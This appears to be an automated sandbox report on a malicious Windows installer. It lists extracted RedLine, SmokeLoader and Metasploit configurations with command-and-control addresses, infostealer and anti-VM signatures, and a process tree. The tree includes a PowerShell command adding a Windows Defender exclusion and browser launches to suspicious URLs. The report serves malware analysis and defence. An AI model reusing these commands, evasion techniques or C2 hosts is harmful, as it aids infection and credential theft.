Analysis
-
max time kernel
1803s -
max time network
1770s -
platform
windows11_x64 -
resource
win11 -
submitted
17-09-2021 09:23
General
-
Target
setup_x86_x64_install.exe
-
Size
6.5MB
-
MD5
591c62c68ce81550a99f07e173a56217
-
SHA1
4e5d00df20e12a0cc74189eb691e063b3a84990a
-
SHA256
1eb3574e7faa18d12759034dcc5a26ac90d79badef17cf1a744854d9a9e41cb0
-
SHA512
71f4068cc19d72251bbb29609d1ff2564228e1050c82006b82e45ac7f868c9e2cae3e738b2d3d30d372f2de4a4e1e52386cc54dede20848af4c92591dadfb4a5
Score
10/10
Malware Config
Extracted
Family
redline
Botnet
ANI
C2
45.142.215.47:27643
Extracted
Family
redline
Botnet
medianew
C2
91.121.67.60:62102
Extracted
Family
metasploit
Version
windows/single_exec
Extracted
Family
smokeloader
Version
2020
C2
http://venerynnet1.top/
http://kevonahira2.top/
http://vegangelist3.top/
http://kingriffaele4.top/
http://arakeishant5.top/
rc4.i32
rc4.i32
Signatures
-
Glupteba
Glupteba is a modular loader written in Golang with various components.
-
Glupteba Payload 1 IoCs
-
MetaSploit
Detected malicious payload which is part of the Metasploit Framework, likely generated with msfvenom or similar.
-
Modifies Windows Defender Real-time Protection settings 3 TTPs
-
Process spawned unexpected child process 4 IoCs
This typically indicates the parent process was compromised via an exploit or macro.
-
Raccoon
Simple but powerful infostealer which was very active in 2019.
-
RedLine
RedLine Stealer is a malware family written in C#, first appearing in early 2020.
-
RedLine Payload 6 IoCs
-
SmokeLoader
Modular backdoor trojan in use since 2014.
-
Socelars
Socelars is an infostealer targeting browser cookies and credit card credentials.
-
Socelars Payload 1 IoCs
-
Suspicious use of NtCreateProcessExOtherParentProcess 30 IoCs
-
Vidar
Vidar is an infostealer based on Arkei stealer.
-
Checks for common network interception software 1 TTPs
Looks in the registry for tools like Wireshark or Fiddler commonly used to analyze network activity.
-
Identifies VirtualBox via ACPI registry values (likely anti-VM) 2 TTPs
-
Vidar Stealer 1 IoCs
-
ASPack v2.12-2.42 7 IoCs
Detects executables packed with ASPack v2.12-2.42
-
Blocklisted process makes network request 50 IoCs
-
Downloads MZ/PE file
-
Drops file in Drivers directory 2 IoCs
-
Executes dropped EXE 64 IoCs
-
VMProtect packed file 3 IoCs
Detects executables packed with VMProtect commercial packer.
-
Checks BIOS information in registry 2 TTPs 21 IoCs
BIOS information is often read in order to detect sandboxing environments.
-
Loads dropped DLL 36 IoCs
-
Reads user/profile data of web browsers 2 TTPs
Infostealers often target stored browser data, which can include saved credentials etc.
-
Themida packer 1 IoCs
Detects Themida, an advanced Windows software protection system.
-
Accesses 2FA software files, possible credential harvesting 2 TTPs
-
Accesses cryptocurrency files/wallets, possible credential harvesting 2 TTPs
-
Adds Run key to start application 2 TTPs 3 IoCs
-
Checks installed software on the system 1 TTPs
Looks up Uninstall key entries in the registry to enumerate software on the system.
-
Checks whether UAC is enabled 1 TTPs 9 IoCs
-
Drops desktop.ini file(s) 2 IoCs
-
Enumerates connected drives 3 TTPs 64 IoCs
Attempts to read the root path of hard drives other than the default C: drive.
-
Legitimate hosting services abused for malware hosting/C2 1 TTPs
-
Looks up external IP address via web service 7 IoCs
Uses a legitimate IP lookup service to find the infected system's external IP.
-
Drops file in System32 directory 1 IoCs
-
Suspicious use of NtSetInformationThreadHideFromDebugger 10 IoCs
-
Suspicious use of SetThreadContext 8 IoCs
-
Drops file in Program Files directory 35 IoCs
-
Drops file in Windows directory 31 IoCs
-
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s). Likely ransomware behaviour.
-
Program crash 31 IoCs
-
Checks SCSI registry key(s) 3 TTPs 6 IoCs
SCSI information is often read in order to detect sandboxing environments.
-
Checks processor information in registry 2 TTPs 64 IoCs
Processor information is often read in order to detect sandboxing environments.
-
Creates scheduled task(s) 1 TTPs 6 IoCs
Schtasks is often used by malware for persistence or to perform post-infection execution.
-
Delays execution with timeout.exe 1 IoCs
-
Enumerates system info in registry 2 TTPs 64 IoCs
-
Kills process with taskkill 4 IoCs
-
Modifies data under HKEY_USERS 46 IoCs
-
Modifies registry class 4 IoCs
-
Modifies system certificate store 2 TTPs 5 IoCs
-
Suspicious behavior: EnumeratesProcesses 64 IoCs
-
Suspicious behavior: GetForegroundWindowSpam 1 IoCs
-
Suspicious behavior: MapViewOfSection 2 IoCs
-
Suspicious use of AdjustPrivilegeToken 64 IoCs
-
Suspicious use of FindShellTrayWindow 7 IoCs
-
Suspicious use of SendNotifyMessage 3 IoCs
-
Suspicious use of SetWindowsHookEx 2 IoCs
-
Suspicious use of WriteProcessMemory 64 IoCs
Processes
-
C:\Users\Admin\AppData\Local\Temp\setup_x86_x64_install.exe"C:\Users\Admin\AppData\Local\Temp\setup_x86_x64_install.exe"1⤵
- Suspicious use of WriteProcessMemory
-
C:\Users\Admin\AppData\Local\Temp\setup_installer.exe"C:\Users\Admin\AppData\Local\Temp\setup_installer.exe"2⤵
- Executes dropped EXE
- Suspicious use of WriteProcessMemory
-
C:\Users\Admin\AppData\Local\Temp\7zS8FD45A90\setup_install.exe"C:\Users\Admin\AppData\Local\Temp\7zS8FD45A90\setup_install.exe"3⤵
- Executes dropped EXE
- Loads dropped DLL
- Suspicious use of WriteProcessMemory
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c powershell -inputformat none -outputformat none -NonInteractive -Command Add-MpPreference -ExclusionPath "C:\Users\Admin\AppData\Local\Temp"4⤵
- Suspicious use of WriteProcessMemory
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exepowershell -inputformat none -outputformat none -NonInteractive -Command Add-MpPreference -ExclusionPath "C:\Users\Admin\AppData\Local\Temp"5⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c Fri004dba7f4795.exe /mixone4⤵
- Suspicious use of WriteProcessMemory
-
C:\Users\Admin\AppData\Local\Temp\7zS8FD45A90\Fri004dba7f4795.exeFri004dba7f4795.exe /mixone5⤵
- Executes dropped EXE
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 5100 -s 3086⤵
- Program crash
- Checks processor information in registry
- Enumerates system info in registry
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c Fri008331ebfd49.exe4⤵
- Suspicious use of WriteProcessMemory
-
C:\Users\Admin\AppData\Local\Temp\7zS8FD45A90\Fri008331ebfd49.exeFri008331ebfd49.exe5⤵
- Executes dropped EXE
- Suspicious use of AdjustPrivilegeToken
-
C:\Users\Admin\AppData\Local\Temp\tmpD07F_tmp.exe"C:\Users\Admin\AppData\Local\Temp\tmpD07F_tmp.exe"6⤵
- Executes dropped EXE
- Suspicious use of SetThreadContext
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c Fri009c920a62076f.exe4⤵
- Suspicious use of WriteProcessMemory
-
C:\Users\Admin\AppData\Local\Temp\7zS8FD45A90\Fri009c920a62076f.exeFri009c920a62076f.exe5⤵
- Executes dropped EXE
-
C:\Users\Admin\AppData\Local\Temp\7zS8FD45A90\Fri009c920a62076f.exeC:\Users\Admin\AppData\Local\Temp\7zS8FD45A90\Fri009c920a62076f.exe6⤵
- Executes dropped EXE
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c Fri00ab2eee15cd1.exe4⤵
- Suspicious use of WriteProcessMemory
-
C:\Users\Admin\AppData\Local\Temp\7zS8FD45A90\Fri00ab2eee15cd1.exeFri00ab2eee15cd1.exe5⤵
- Executes dropped EXE
-
C:\Users\Admin\AppData\Local\Temp\is-D0L12.tmp\Fri00ab2eee15cd1.tmp"C:\Users\Admin\AppData\Local\Temp\is-D0L12.tmp\Fri00ab2eee15cd1.tmp" /SL5="$2014A,506086,422400,C:\Users\Admin\AppData\Local\Temp\7zS8FD45A90\Fri00ab2eee15cd1.exe"6⤵
- Executes dropped EXE
- Loads dropped DLL
-
C:\Users\Admin\AppData\Local\Temp\is-DGFPF.tmp\___YHDG34.exe"C:\Users\Admin\AppData\Local\Temp\is-DGFPF.tmp\___YHDG34.exe" /S /UID=burnerch27⤵
- Drops file in Drivers directory
- Executes dropped EXE
- Adds Run key to start application
- Drops file in Program Files directory
-
C:\Program Files\Windows Defender Advanced Threat Protection\VAONQHHNYJ\ultramediaburner.exe"C:\Program Files\Windows Defender Advanced Threat Protection\VAONQHHNYJ\ultramediaburner.exe" /VERYSILENT8⤵
- Executes dropped EXE
-
C:\Users\Admin\AppData\Local\Temp\is-THB2B.tmp\ultramediaburner.tmp"C:\Users\Admin\AppData\Local\Temp\is-THB2B.tmp\ultramediaburner.tmp" /SL5="$302FE,281924,62464,C:\Program Files\Windows Defender Advanced Threat Protection\VAONQHHNYJ\ultramediaburner.exe" /VERYSILENT9⤵
- Executes dropped EXE
- Drops file in Program Files directory
- Suspicious use of FindShellTrayWindow
-
C:\Program Files (x86)\UltraMediaBurner\UltraMediaBurner.exe"C:\Program Files (x86)\UltraMediaBurner\UltraMediaBurner.exe" -silent -desktopShortcut -programMenu10⤵
- Executes dropped EXE
-
C:\Users\Admin\AppData\Local\Temp\b8-6b22a-f93-099bf-9843425aa2bac\Buvufaepywu.exe"C:\Users\Admin\AppData\Local\Temp\b8-6b22a-f93-099bf-9843425aa2bac\Buvufaepywu.exe"8⤵
- Executes dropped EXE
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --single-argument https://www.profitabletrustednetwork.com/e2q8zu9hu?key=a971bbe4a40a7216a1a87d8f455f71e69⤵
- Adds Run key to start application
- Enumerates system info in registry
- Suspicious use of FindShellTrayWindow
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" --annotation=IsOfficialBuild=1 --annotation=channel= --annotation=chromium-version=92.0.4515.107 "--annotation=exe=C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --annotation=plat=Win64 "--annotation=prod=Microsoft Edge" --annotation=ver=92.0.902.62 --initial-client-data=0x104,0x108,0x10c,0x100,0x110,0x7ff85fcb46f8,0x7ff85fcb4708,0x7ff85fcb471810⤵
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=gpu-process --field-trial-handle=2128,7236837350702951620,14202802338348434375,131072 --gpu-preferences=UAAAAAAAAADgAAAQAAAAAAAAAAAAAAAAAABgAAAAAAAwAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAHgAAAAAAAAAeAAAAAAAAAAoAAAABAAAACAAAAAAAAAAKAAAAAAAAAAwAAAAAAAAADgAAAAAAAAAEAAAAAAAAAAAAAAADQAAABAAAAAAAAAAAQAAAA0AAAAQAAAAAAAAAAQAAAANAAAAEAAAAAAAAAAHAAAADQAAAAgAAAAAAAAACAAAAAAAAAA= --mojo-platform-channel-handle=2216 /prefetch:210⤵
- Executes dropped EXE
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=storage.mojom.StorageService --field-trial-handle=2128,7236837350702951620,14202802338348434375,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=2612 /prefetch:810⤵
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --field-trial-handle=2128,7236837350702951620,14202802338348434375,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2268 /prefetch:310⤵
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2128,7236837350702951620,14202802338348434375,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=6 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3224 /prefetch:110⤵
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2128,7236837350702951620,14202802338348434375,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=5 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3232 /prefetch:110⤵
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2128,7236837350702951620,14202802338348434375,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=7 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3672 /prefetch:110⤵
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2128,7236837350702951620,14202802338348434375,131072 --lang=en-US --disable-client-side-phishing-detection --instant-process --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=8 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3688 /prefetch:110⤵
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2128,7236837350702951620,14202802338348434375,131072 --disable-gpu-compositing --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=9 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5608 /prefetch:110⤵
-
C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.62\identity_helper.exe"C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.62\identity_helper.exe" --type=utility --utility-sub-type=winrt_app_id.mojom.WinrtAppIdService --field-trial-handle=2128,7236837350702951620,14202802338348434375,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=5332 /prefetch:810⤵
-
C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.62\identity_helper.exe"C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.62\identity_helper.exe" --type=utility --utility-sub-type=winrt_app_id.mojom.WinrtAppIdService --field-trial-handle=2128,7236837350702951620,14202802338348434375,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=5332 /prefetch:810⤵
- Executes dropped EXE
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2128,7236837350702951620,14202802338348434375,131072 --disable-gpu-compositing --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=11 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=2384 /prefetch:110⤵
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2128,7236837350702951620,14202802338348434375,131072 --disable-gpu-compositing --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=12 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5884 /prefetch:110⤵
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2128,7236837350702951620,14202802338348434375,131072 --disable-gpu-compositing --lang=en-US --disable-client-side-phishing-detection --instant-process --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=13 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=4840 /prefetch:110⤵
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=gpu-process --field-trial-handle=2128,7236837350702951620,14202802338348434375,131072 --disable-gpu-sandbox --use-gl=disabled --gpu-vendor-id=5140 --gpu-device-id=140 --gpu-sub-system-id=0 --gpu-revision=0 --gpu-driver-version=10.0.22000.1 --gpu-preferences=UAAAAAAAAADoAAAQAAAAAAAAAAAAAAAAAABgAAAEAAAwAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAHgAAAAAAAAAeAAAAAAAAAAoAAAABAAAACAAAAAAAAAAKAAAAAAAAAAwAAAAAAAAADgAAAAAAAAAEAAAAAAAAAAAAAAADQAAABAAAAAAAAAAAQAAAA0AAAAQAAAAAAAAAAQAAAANAAAAEAAAAAAAAAAHAAAADQAAAAgAAAAAAAAACAAAAAAAAAA= --mojo-platform-channel-handle=5136 /prefetch:210⤵
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2128,7236837350702951620,14202802338348434375,131072 --disable-gpu-compositing --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=15 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=6120 /prefetch:110⤵
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=unzip.mojom.Unzipper --field-trial-handle=2128,7236837350702951620,14202802338348434375,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=5568 /prefetch:810⤵
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2128,7236837350702951620,14202802338348434375,131072 --disable-gpu-compositing --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=17 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5596 /prefetch:110⤵
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2128,7236837350702951620,14202802338348434375,131072 --disable-gpu-compositing --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=18 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=4828 /prefetch:110⤵
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=unzip.mojom.Unzipper --field-trial-handle=2128,7236837350702951620,14202802338348434375,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=1040 /prefetch:810⤵
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2128,7236837350702951620,14202802338348434375,131072 --disable-gpu-compositing --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=20 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3688 /prefetch:110⤵
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2128,7236837350702951620,14202802338348434375,131072 --disable-gpu-compositing --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=21 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3232 /prefetch:110⤵
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=entity_extraction_service.mojom.Extractor --field-trial-handle=2128,7236837350702951620,14202802338348434375,131072 --lang=en-US --service-sandbox-type=entity_extraction --mojo-platform-channel-handle=6308 /prefetch:810⤵
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2128,7236837350702951620,14202802338348434375,131072 --disable-gpu-compositing --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=23 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=1528 /prefetch:110⤵
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2128,7236837350702951620,14202802338348434375,131072 --disable-gpu-compositing --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=24 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=6544 /prefetch:110⤵
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2128,7236837350702951620,14202802338348434375,131072 --disable-gpu-compositing --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=26 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3672 /prefetch:110⤵
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2128,7236837350702951620,14202802338348434375,131072 --disable-gpu-compositing --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=27 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=2140 /prefetch:110⤵
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=unzip.mojom.Unzipper --field-trial-handle=2128,7236837350702951620,14202802338348434375,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=4180 /prefetch:810⤵
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2128,7236837350702951620,14202802338348434375,131072 --disable-gpu-compositing --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=29 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=4448 /prefetch:110⤵
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2128,7236837350702951620,14202802338348434375,131072 --disable-gpu-compositing --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=30 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=4052 /prefetch:110⤵
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2128,7236837350702951620,14202802338348434375,131072 --disable-gpu-compositing --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=33 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=4916 /prefetch:110⤵
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2128,7236837350702951620,14202802338348434375,131072 --disable-gpu-compositing --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=34 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=1952 /prefetch:110⤵
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=unzip.mojom.Unzipper --field-trial-handle=2128,7236837350702951620,14202802338348434375,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=6284 /prefetch:810⤵
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2128,7236837350702951620,14202802338348434375,131072 --disable-gpu-compositing --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=38 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5912 /prefetch:110⤵
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2128,7236837350702951620,14202802338348434375,131072 --disable-gpu-compositing --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=39 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5864 /prefetch:110⤵
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=unzip.mojom.Unzipper --field-trial-handle=2128,7236837350702951620,14202802338348434375,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=6128 /prefetch:810⤵
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=unzip.mojom.Unzipper --field-trial-handle=2128,7236837350702951620,14202802338348434375,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=4912 /prefetch:810⤵
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2128,7236837350702951620,14202802338348434375,131072 --disable-gpu-compositing --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=44 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=4840 /prefetch:110⤵
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2128,7236837350702951620,14202802338348434375,131072 --disable-gpu-compositing --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=45 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=2140 /prefetch:110⤵
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2128,7236837350702951620,14202802338348434375,131072 --disable-gpu-compositing --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=46 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=1260 /prefetch:110⤵
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2128,7236837350702951620,14202802338348434375,131072 --disable-gpu-compositing --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=47 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=4940 /prefetch:110⤵
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --single-argument https://www.profitabletrustednetwork.com/b1fsmdd9m?key=7e872dab99d78bffc4aa0c1e6b062dad9⤵
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" --annotation=IsOfficialBuild=1 --annotation=channel= --annotation=chromium-version=92.0.4515.107 "--annotation=exe=C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --annotation=plat=Win64 "--annotation=prod=Microsoft Edge" --annotation=ver=92.0.902.62 --initial-client-data=0x100,0x104,0x108,0xdc,0x10c,0x7ff85fcb46f8,0x7ff85fcb4708,0x7ff85fcb471810⤵
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --single-argument http://vexacion.com/afu.php?zoneid=18514839⤵
-
